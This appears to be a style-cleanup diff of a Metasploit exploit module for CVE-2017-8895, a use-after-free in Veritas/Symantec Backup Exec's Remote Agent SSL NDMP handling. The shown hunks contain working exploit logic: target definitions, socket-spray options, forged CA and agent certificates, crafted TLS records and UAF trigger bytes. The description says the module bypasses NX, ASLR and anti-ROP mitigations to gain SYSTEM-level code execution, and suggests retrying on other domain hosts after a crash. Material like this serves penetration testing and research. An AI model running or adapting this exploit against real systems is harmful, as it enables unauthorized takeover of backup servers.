@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'openssl'
 require 'xdr'
 
@@ -13,47 +12,46 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::NDMPSocket
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free',
-      'Description'    => %q{
-        This module exploits a use-after-free vulnerability in the handling of SSL NDMP
-        connections in Veritas/Symantec Backup Exec's Remote Agent for Windows. When SSL
-        is re-established on a NDMP connection that previously has had SSL established,
-        the BIO struct for the connection's previous SSL session is reused, even though it
-        has previously been freed.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free',
+        'Description' => %q{
+          This module exploits a use-after-free vulnerability in the handling of SSL NDMP
+          connections in Veritas/Symantec Backup Exec's Remote Agent for Windows. When SSL
+          is re-established on a NDMP connection that previously has had SSL established,
+          the BIO struct for the connection's previous SSL session is reused, even though it
+          has previously been freed.
 
-        This module supports 3 specific versions of the Backup Exec agent in the 14, 15
-        and 16 series on 64-bit and 32-bit versions of Windows and has been tested from
-        Vista to Windows 10. The check command can help narrow down what major and minor
-        revision is installed and the precise of version of Windows, but some other
-        information may be required to make a reliable choice of target.
+          This module supports 3 specific versions of the Backup Exec agent in the 14, 15
+          and 16 series on 64-bit and 32-bit versions of Windows and has been tested from
+          Vista to Windows 10. The check command can help narrow down what major and minor
+          revision is installed and the precise of version of Windows, but some other
+          information may be required to make a reliable choice of target.
 
-        NX, ASLR and Windows 8+ anti-ROP mitigations are bypassed. On Windows 8+, it has a
-        reliability of around 85%. On other versions of Windows, reliability is around 35%
-        (due to the need to win a race condition across the network in this case; this may
-        drop further depending on network conditions). The agent is normally installed on
-        all hosts in a domain that need to be backed up, so if one service crashes, try
-        again on another :) Successful exploitation will give remote code execution as the
-        user of the Backup Exec Remote Agent for Windows service, almost always
-        NT AUTHORITY\SYSTEM.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'Matthew Daley' ],
-      'References'     =>
-        [
+          NX, ASLR and Windows 8+ anti-ROP mitigations are bypassed. On Windows 8+, it has a
+          reliability of around 85%. On other versions of Windows, reliability is around 35%
+          (due to the need to win a race condition across the network in this case; this may
+          drop further depending on network conditions). The agent is normally installed on
+          all hosts in a domain that need to be backed up, so if one service crashes, try
+          again on another :) Successful exploitation will give remote code execution as the
+          user of the Backup Exec Remote Agent for Windows service, almost always
+          NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Matthew Daley' ],
+        'References' => [
           [ 'CVE', '2017-8895' ],
           [ 'VTS', '17-006' ],
-          [ 'URL', 'https://www.veritas.com/content/support/en_US/security/VTS17-006.html' ]
+          [ 'URL', 'http://web.archive.org/web/20181112174302/https://www.veritas.com/content/support/en_US/security/VTS17-006.html' ]
         ],
-      'Platform'       => 'win',
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
-      'Payload'        =>
-        {
+        'Platform' => 'win',
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Payload' => {
           'DisableNops' => true
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           [
             'Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64',
             { 'Version' => 14, 'Arch' => ARCH_X64, 'Win8Upwards' => true }
@@ -103,20 +101,26 @@ class MetasploitModule < Msf::Exploit::Remote
             { 'Version' => 16, 'Arch' => ARCH_X86, 'Win8Upwards' => false }
           ]
         ],
-      'DefaultOptions' =>
-        {
-          'RPORT'              => 10000,
+        'DefaultOptions' => {
+          'RPORT' => 10000,
           'NumTriggerAttempts' => 50,
-          'EXITFUNC'           => 'thread'
+          'EXITFUNC' => 'thread'
         },
-      'Privileged'     => true,
-      'DisclosureDate' => '2017-05-10',
-      'DefaultTarget'  => 8))
+        'Privileged' => true,
+        'DisclosureDate' => '2017-05-10',
+        'DefaultTarget' => 8,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([
-      OptInt.new('NumSpraySockets',    [ false, 'Number of sockets to spray stage 1 with' ]),
+      OptInt.new('NumSpraySockets', [ false, 'Number of sockets to spray stage 1 with' ]),
       OptInt.new('NumTLSSpraySockets', [ false, 'Number of sockets to spray TLS extensions with' ]),
-      OptInt.new('NumTriggerAttempts', [ true,  'Number of attempts to trigger the vulnerability (Windows 8+ only)' ])
+      OptInt.new('NumTriggerAttempts', [ true, 'Number of attempts to trigger the vulnerability (Windows 8+ only)' ])
     ])
   end
 
@@ -126,6 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     resp = s.do_request_response(NDMP::Message.new_request(NDMP::Message::CONFIG_GET_HOST_INFO))
     return CheckCode::Unknown unless resp
+
     info = HostInfoResponse.from_xdr(resp.body)
     print_line('Hostname: ' + info.hostname)
     print_line('OS type: ' + info.os_type)
@@ -138,6 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     resp = s.do_request_response(NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO))
     return CheckCode::Unknown unless resp
+
     info = ServiceInfoResponse.from_xdr(resp.body)
     print_line('Vendor: ' + info.vendor_name)
     print_line('Product: ' + info.product_name)
@@ -401,33 +407,33 @@ class MetasploitModule < Msf::Exploit::Remote
       seal
     end
 
-    attribute :opcode,            Opcode
+    attribute :opcode, Opcode
     attribute :media_server_name, XDR::String[]
     attribute :media_server_fqdn, XDR::String[]
     attribute :media_server_addr, XDR::String[]
-    attribute :cert_id_1,         XDR::Int
-    attribute :cert_id_2,         XDR::Int
-    attribute :unknown1,          XDR::Int
-    attribute :unknown2,          XDR::Int
-    attribute :unknown3,          XDR::Int
-    attribute :ca_cert,           XDR::String[]
-    attribute :unknown4,          XDR::Int
-    attribute :agent_cert,        XDR::String[]
+    attribute :cert_id_1, XDR::Int
+    attribute :cert_id_2, XDR::Int
+    attribute :unknown1, XDR::Int
+    attribute :unknown2, XDR::Int
+    attribute :unknown3, XDR::Int
+    attribute :ca_cert, XDR::String[]
+    attribute :unknown4, XDR::Int
+    attribute :agent_cert, XDR::String[]
 
     def self.new_for_opcode(opcode)
       new(
-        :opcode            => opcode,
+        :opcode => opcode,
         :media_server_name => 'foo',
         :media_server_fqdn => 'foo',
         :media_server_addr => 'foo',
-        :cert_id_1         => 0,
-        :cert_id_2         => 0,
-        :unknown1          => 0,
-        :unknown2          => 0,
-        :unknown3          => 0,
-        :ca_cert           => '',
-        :unknown4          => 0,
-        :agent_cert        => ''
+        :cert_id_1 => 0,
+        :cert_id_2 => 0,
+        :unknown1 => 0,
+        :unknown2 => 0,
+        :unknown3 => 0,
+        :ca_cert => '',
+        :unknown4 => 0,
+        :agent_cert => ''
       )
     end
   end
@@ -445,26 +451,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   class ServiceInfoResponse < XDR::Struct
-    attribute :error,           XDR::Int
-    attribute :vendor_name,     XDR::String[]
-    attribute :product_name,    XDR::String[]
+    attribute :error, XDR::Int
+    attribute :vendor_name, XDR::String[]
+    attribute :product_name, XDR::String[]
     attribute :revision_number, XDR::String[]
-    attribute :auth_types,      XDR::VarArray[XDR::Int]
+    attribute :auth_types, XDR::VarArray[XDR::Int]
   end
 
   class HostInfoResponse < XDR::Struct
-    attribute :error,      XDR::Int
-    attribute :hostname,   XDR::String[]
-    attribute :os_type,    XDR::String[]
+    attribute :error, XDR::Int
+    attribute :hostname, XDR::String[]
+    attribute :os_type, XDR::String[]
     attribute :os_version, XDR::String[]
-    attribute :host_id,    XDR::String[]
-    attribute :unknown,    XDR::VarArray[XDR::Int]
+    attribute :host_id, XDR::String[]
+    attribute :unknown, XDR::VarArray[XDR::Int]
   end
 
   #
   # Perform NDMP connection handshake on a NDMP socket. Can be split into 3 stages.
   #
-  def connect_ndmp(s, version, phase=nil)
+  def connect_ndmp(s, version, phase = nil)
     if phase.nil? || phase == 1
       return false unless s.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)
     end
@@ -478,6 +484,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if phase.nil? || phase == 3
       msg = s.read_ndmp_msg(NDMP::Message::CONNECT_OPEN)
       return false unless msg
+
       fail_with(Failure::UnexpectedReply, 'Bad connect result') unless XDR::Int.from_xdr(msg.body).zero?
     end
 
@@ -506,7 +513,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Send a Backup Exec-specific SSL NDMP request and receive the response.
   #
-  def do_simple_ssl_request(s, opcode, ca_cert_id, phase=nil)
+  def do_simple_ssl_request(s, opcode, ca_cert_id, phase = nil)
     if phase.nil? || phase == 1
       req = SSLRequest.new_for_opcode(opcode)
       req.cert_id_1 = req.cert_id_2 = ca_cert_id
@@ -515,6 +522,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if block_given?
         last = s.prepare_and_write_ndmp_msg(msg, true)
         return nil unless last
+
         sleep(1)
         yield true
         s.raw_sendall(last, 0)
@@ -536,7 +544,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Send a Backup Exec SSL NDMP request and receive the response, requiring the response
   # to be empty.
   #
-  def require_empty_ssl_request(s, opcode, ca_cert_id, phase=nil)
+  def require_empty_ssl_request(s, opcode, ca_cert_id, phase = nil)
     resp = do_simple_ssl_request(s, opcode, ca_cert_id, phase)
     if phase.nil? || phase == 2
       fail_with(Failure::UnexpectedReply, "Failed to perform SSL request/response (opcode #{opcode})") unless resp
@@ -555,15 +563,15 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Create a self-signed CA certificate and matching key.
   #
-  def generate_ca_cert_and_key(key_len=2048)
+  def generate_ca_cert_and_key(key_len = 2048)
     ca_key = OpenSSL::PKey::RSA.new(key_len)
 
     ca_cert = OpenSSL::X509::Certificate.new
-    ca_cert.version    = 3
-    ca_cert.serial     = 1
-    ca_cert.subject    = ca_cert.issuer = OpenSSL::X509::Name.parse('/CN=SSL UAF')
+    ca_cert.version = 3
+    ca_cert.serial = 1
+    ca_cert.subject = ca_cert.issuer = OpenSSL::X509::Name.parse('/CN=SSL UAF')
     ca_cert.not_before = Time.now - 60 * 60 * 24
-    ca_cert.not_after  = Time.now + 60 * 60 * 24 * 365
+    ca_cert.not_after = Time.now + 60 * 60 * 24 * 365
     ca_cert.public_key = ca_key.public_key
 
     extn_factory = OpenSSL::X509::ExtensionFactory.new(ca_cert, ca_cert)
@@ -586,15 +594,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def handle_a_csr(s, ca_cert, ca_key)
     resp = do_simple_ssl_request(s, SSLRequest::Opcode.get_csr_req, 0)
     return nil if resp.nil?
+
     request = OpenSSL::X509::Request.new(resp.unknown2)
 
     agent_cert = OpenSSL::X509::Certificate.new
-    agent_cert.version    = 3
-    agent_cert.serial     = 2
-    agent_cert.subject    = request.subject
-    agent_cert.issuer     = ca_cert.subject
+    agent_cert.version = 3
+    agent_cert.serial = 2
+    agent_cert.subject = request.subject
+    agent_cert.issuer = ca_cert.subject
     agent_cert.not_before = Time.now - 60 * 60 * 24
-    agent_cert.not_after  = Time.now + 60 * 60 * 24 * 365
+    agent_cert.not_after = Time.now + 60 * 60 * 24 * 365
     agent_cert.public_key = request.public_key
 
     extn_factory = OpenSSL::X509::ExtensionFactory.new(ca_cert, agent_cert)
@@ -618,7 +627,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Generate a TLS handshake record with the given payload.
   #
-  def generate_tls_handshake_record(payload, required_fifth_byte=nil)
+  def generate_tls_handshake_record(payload, required_fifth_byte = nil)
     fail_with(Failure::Unknown, 'No payload') if payload.empty?
 
     # Stage 1 for the x86 version 14 target jumps into the TLS header itself (at offset
@@ -1283,29 +1292,30 @@ class MetasploitModule < Msf::Exploit::Remote
       # through the retsled
       print_status("Triggering UAF, attempt #{x + 1}/#{datastore['NumTriggerAttempts']}...")
       trigger = if target.opts['Version'] == 14
-        if x == 0
-          # A maximum of 5 bytes are always read at first, so just send them all at once
-          "\x16\x03\x01\x10\x00"
-        elsif x == 1
-          # Skip over TLS header structure
-          rand_text((target.opts['Arch'] == ARCH_X64 ? 0x18 : 0x10) - 5)
-        else
-          # Skip over a ROP NOP
-          rand_text(target.opts['Arch'] == ARCH_X64 ? 8 : 4)
-        end
-      else
-        if x == 0
-          # A maximum of 11 bytes are always read at first, so just send them all at once
-          "\x90\x00\x01\x03\x03" + rand_text(11 - 5)
-        elsif x == 1
-          # Skip over SSLv2 header structure
-          rand_text((target.opts['Arch'] == ARCH_X64 ? 0x20 : 0x10) - 11)
-        else
-          # Skip over a ROP NOP
-          rand_text(target.opts['Arch'] == ARCH_X64 ? 8 : 4)
-        end
-      end
+                  if x == 0
+                    # A maximum of 5 bytes are always read at first, so just send them all at once
+                    "\x16\x03\x01\x10\x00"
+                  elsif x == 1
+                    # Skip over TLS header structure
+                    rand_text((target.opts['Arch'] == ARCH_X64 ? 0x18 : 0x10) - 5)
+                  else
+                    # Skip over a ROP NOP
+                    rand_text(target.opts['Arch'] == ARCH_X64 ? 8 : 4)
+                  end
+                else
+                  if x == 0
+                    # A maximum of 11 bytes are always read at first, so just send them all at once
+                    "\x90\x00\x01\x03\x03" + rand_text(11 - 5)
+                  elsif x == 1
+                    # Skip over SSLv2 header structure
+                    rand_text((target.opts['Arch'] == ARCH_X64 ? 0x20 : 0x10) - 11)
+                  else
+                    # Skip over a ROP NOP
+                    rand_text(target.opts['Arch'] == ARCH_X64 ? 8 : 4)
+                  end
+                end
       return false unless s.raw_sendall(trigger, 0)
+
       sleep(1)
       return true if @payload_connected || session_created?
     end
